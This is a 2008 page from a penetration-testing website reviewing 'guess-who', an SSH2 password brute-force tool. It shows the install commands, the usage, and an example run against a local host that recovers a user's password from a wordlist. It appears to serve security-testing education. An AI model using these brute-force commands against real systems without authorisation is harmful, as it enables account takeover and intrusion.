VulnerabilityAssessment.co.uk

Guess Who

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts.

It is available from here.

Installation:

Download to the desired directory

tar -zxvf guess-who-0.44.tgz

make

Execution:

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output:

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal

IT Security News:

more........

Pen Testing Framework:

Pen Test Framework (html)
Source (FreeMind .mm format)
PDF (zip format)
Framework Poster available
Pre-site Template (html)
Pre-site Template (pdf)
Report Template (html)
Report Template (pdf)
Compliance Testing

Latest Tool Reviews:

firecat
creddump
goolag
dirbuster
fgdump password list
CTUpdate (WSUS Offline)
netwox
maltego
more

Information:
DNS Tools
Exploiting NFS
IT Threats
NTP Enumeration
Online Trace Route
Routing Registries
RSS Feed

DNS Tools

Exploiting NFS

© VulnerabilityAssessment.co.uk 25 February 2008